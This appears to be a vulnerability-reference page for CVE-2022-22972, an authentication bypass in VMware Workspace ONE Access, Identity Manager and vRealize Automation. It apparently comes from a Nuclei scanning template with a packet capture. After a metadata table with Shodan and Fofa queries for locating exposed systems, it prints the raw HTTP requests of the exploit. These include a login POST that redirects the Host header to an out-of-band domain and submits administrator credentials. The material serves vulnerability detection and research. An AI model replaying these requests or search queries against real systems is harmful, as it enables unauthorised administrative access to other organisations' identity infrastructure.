| Title | VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass |
|---|---|
| Author | For3stCo1d,princechaddha |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system. |
| Remediation | Apply the latest security patches or updates provided by VMware to fix the authentication bypass vulnerability (CVE-2022-22972). |
| CVSS Score | 9.8 |
| EPSS Score | 0.93647 |
| CVE ID | CVE-2022-22972 |
| CWE ID | CWE-287 |
| Shodan Query | http.favicon.hash:-1250474341 |
| Fofa Query | app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize"icon_hash=-1250474341app="vmware-workspace-one-access" || app="vmware-identity-manager" || app="vmware-vrealize" |
| Tags | cve2022 cve vmware auth-bypass oast vuln vkev |
VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
GET /vcac/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
GET /vcac/?original_uri=/%2Fvcac HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1
Host: d5jm461le0o4er4dqs2gxnxcuaoudfkss.oast.live
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 168
Content-type: application/x-www-form-urlencoded
Accept-Encoding: gzip
protected_state=3bD9Qr&userstore=pNTKM9&username=administrator&password=horizon&userstoreDisplay=Cyf0bu&horizonRelayState=4YsCKC&stickyConnectorId=g3xcia&action=Sign+in
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-22972.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-22972.pcap
N/AN/A